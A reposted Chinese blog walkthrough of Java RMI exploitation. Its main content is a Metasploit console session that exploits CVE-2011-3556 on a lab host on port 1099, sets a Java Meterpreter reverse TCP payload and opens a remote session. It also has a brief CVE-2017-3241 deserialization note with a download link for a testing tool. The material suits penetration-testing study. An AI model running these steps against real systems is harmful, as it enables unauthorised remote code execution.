博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
Java rmi漏洞利用及原理记录
阅读量:4315 次
发布时间:2019-06-06

本文共 5417 字,大约阅读时间需要 18 分钟。

CVE-2011-3556

该模块利用了RMI的默认配置。注册表和RMI激活服务,允许加载类来自任何远程(HTTP)URL。当它在RMI中调用一个方法时分布式垃圾收集器,可通过每个RMI使用endpoint,它可以用于rmiregist和rmid,以及对大多

漏洞利用:

漏洞常用端口1099

msf5 > use  exploit/multi/misc/java_rmi_servermsf5 exploit(multi/misc/java_rmi_server) > show optionsModule options (exploit/multi/misc/java_rmi_server):   Name       Current Setting  Required  Description   ----       ---------------  --------  -----------   HTTPDELAY  10               yes       Time that the HTTP Server will wait for the payload request   RHOST                       yes       The target address   RPORT      1099             yes       The target port (TCP)   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0   SRVPORT    8080             yes       The local port to listen on.   SSL        false            no        Negotiate SSL for incoming connections   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)   URIPATH                     no        The URI to use for this exploit (default is random)Exploit target:   Id  Name   --  ----   0   Generic (Java Payload)msf5 exploit(multi/misc/java_rmi_server) > set rhost 172.16.20.134rhost => 172.16.20.134
msf5 exploit(multi/misc/java_rmi_server) > show payloadsCompatible Payloads===================   #   Name                             Disclosure Date  Rank    Check  Description   -   ----                             ---------------  ----    -----  -----------   0   generic/custom                                    normal  No     Custom Payload   1   generic/shell_bind_tcp                            normal  No     Generic Command Shell, Bind TCP Inline   2   generic/shell_reverse_tcp                         normal  No     Generic Command Shell, Reverse TCP Inline   3   java/jsp_shell_bind_tcp                           normal  No     Java JSP Command Shell, Bind TCP Inline   4   java/jsp_shell_reverse_tcp                        normal  No     Java JSP Command Shell, Reverse TCP Inline   5   java/meterpreter/bind_tcp                         normal  No     Java Meterpreter, Java Bind TCP Stager   6   java/meterpreter/reverse_http                     normal  No     Java Meterpreter, Java Reverse HTTP Stager   7   java/meterpreter/reverse_https                    normal  No     Java Meterpreter, Java Reverse HTTPS Stager   8   java/meterpreter/reverse_tcp                      normal  No     Java Meterpreter, Java Reverse TCP Stager   9   java/shell/bind_tcp                               normal  No     Command Shell, Java Bind TCP Stager   10  java/shell/reverse_tcp                            normal  No     Command Shell, Java Reverse TCP Stager   11  java/shell_reverse_tcp                            normal  No     Java Command Shell, Reverse TCP Inline   12  multi/meterpreter/reverse_http                    normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Mulitple Architectures)   13  multi/meterpreter/reverse_https                   normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Mulitple Architectures)msf5 exploit(multi/misc/java_rmi_server) > set payload  java/meterpreter/reverse_tcp
msf5 exploit(multi/misc/java_rmi_server) > show optionsModule options (exploit/multi/misc/java_rmi_server):   Name       Current Setting  Required  Description   ----       ---------------  --------  -----------   HTTPDELAY  10               yes       Time that the HTTP Server will wait for the payload request   RHOSTS     172.16.20.207    yes       The target address range or CIDR identifier   RPORT      1099             yes       The target port (TCP)   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0   SRVPORT    8080             yes       The local port to listen on.   SSL        false            no        Negotiate SSL for incoming connections   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)   URIPATH                     no        The URI to use for this exploit (default is random)Payload options (java/meterpreter/reverse_tcp):   Name   Current Setting  Required  Description   ----   ---------------  --------  -----------   LHOST  172.16.20.134    yes       The listen address (an interface may be specified)   LPORT  4444             yes       The listen portExploit target:   Id  Name   --  ----   0   Generic (Java Payload)
msf5 exploit(multi/misc/java_rmi_server) > set lhost 172.16.20.134lhost => 172.16.20.134msf5 exploit(multi/misc/java_rmi_server) > run[*] Started reverse TCP handler on 172.16.20.134:4444[*] 172.16.20.207:1099 - Using URL: http://0.0.0.0:8080/dPdVbFGof9[*] 172.16.20.207:1099 - Local IP: http://172.16.20.134:8080/dPdVbFGof9[*] 172.16.20.207:1099 - Server started.[*] 172.16.20.207:1099 - Sending RMI Header...[*] 172.16.20.207:1099 - Sending RMI Call...[*] 172.16.20.207:1099 - Replied to request for payload JAR[*] Sending stage (53844 bytes) to 172.16.20.207[*] Meterpreter session 1 opened (172.16.20.134:4444 -> 172.16.20.207:52793) at 2019-08-15 18:33:28 +0800[*] 172.16.20.207:1099 - Server stopped.

反弹shell,利用成功

 

CVE-2017-3241

漏洞利用机制:1.存在反序列化传输。2.存在有缺陷的第三方库如commons-collections ,或者知道公开的类名

小天之天的测试工具:https://pan.baidu.com/s/1pb-br4vhKT6JlT6MmjHqGg 密码:jkl8

 

 

转载于:https://www.cnblogs.com/junsec/p/11356923.html

你可能感兴趣的文章
mysql数据库存放路径
查看>>
TestNG(五)常用元素的操作
查看>>
解决 Visual Studio 点击添加引用无反应的问题
查看>>
通过镜像下载Android系统源码
查看>>
python字符串格式化 %操作符 {}操作符---总结
查看>>
windows 不能在 本地计算机 启动 Apache
查看>>
iOS开发报duplicate symbols for architecture x86_64错误的问题
查看>>
Chap-6 6.4.2 堆和栈
查看>>
【Java学习笔记之九】java二维数组及其多维数组的内存应用拓展延伸
查看>>
C# MySql 连接
查看>>
网络抓包分析方法大全
查看>>
sql 数据类型
查看>>
android 截图
查看>>
WebServicer接口类生成方法。
查看>>
POJ 1740
查看>>
【翻译】火影忍者鸣人 疾风传 终级风暴2 制作介绍
查看>>
http和webservice
查看>>
hdu1879------------prim算法模板
查看>>
jdbc之二:DAO模式
查看>>
MySQL性能优化方法一:缓存参数优化
查看>>
喝酒易醉,品茶养心,人生如梦,品茶悟道,何以解忧?唯有杜康!-- 愿君每日到此一游!
当前时间: 2024-10-06 09:19:53   当前IP: 3.142.200.109   联系邮箱:javaeecc@qq.com     Copyright © 2020 - 2022 baihongyu.com 京ICP备2021015314号-2
强烈建议你试试无所不能的CHAT-GPT,快点击我
强烈建议你试试无所不能的CHAT-GPT,快点击我